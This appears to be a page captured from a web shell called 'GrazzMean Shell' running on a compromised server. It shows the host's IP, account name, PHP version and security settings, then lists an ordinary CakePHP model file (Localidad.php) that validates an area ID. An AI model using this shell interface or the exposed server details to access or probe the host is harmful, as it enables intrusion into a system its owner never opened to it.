shell bypass 403

GrazzMean Shell

Uname: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
Software: Apache
PHP version: 5.6.40 [ PHP INFO ] PHP os: Linux
Server Ip: 217.160.0.194
Your Ip: 216.73.216.203
User: u72294154 (9179942) | Group: ftpusers (600)
Safe Mode: OFF
Disable Function:
NONE

name : Localidad.php
<?

App::uses('Area', 'Model');

class Localidad extends AppModel {

    public $validate = array(
        'area_id' => array(
            'exist' => array(
                'allowEmpty' => true,
                'rule' => 'checkExist',
                'message' => 'Debes seleccionar un cliente existente'
            )
        ),
    );


    public function checkExist($check) {
        $elemento = null;
        $campo = key($check);
        switch ($campo) {
            case 'area_id':
                $elementos = new Area();
                $elemento = $elementos->findById($this->data[$this->name][$campo]);
                break;
        }

        if (empty($elemento)) {
            return false; //error
        }

        return true; //ok
    }
	
}
© 2026 GrazzMean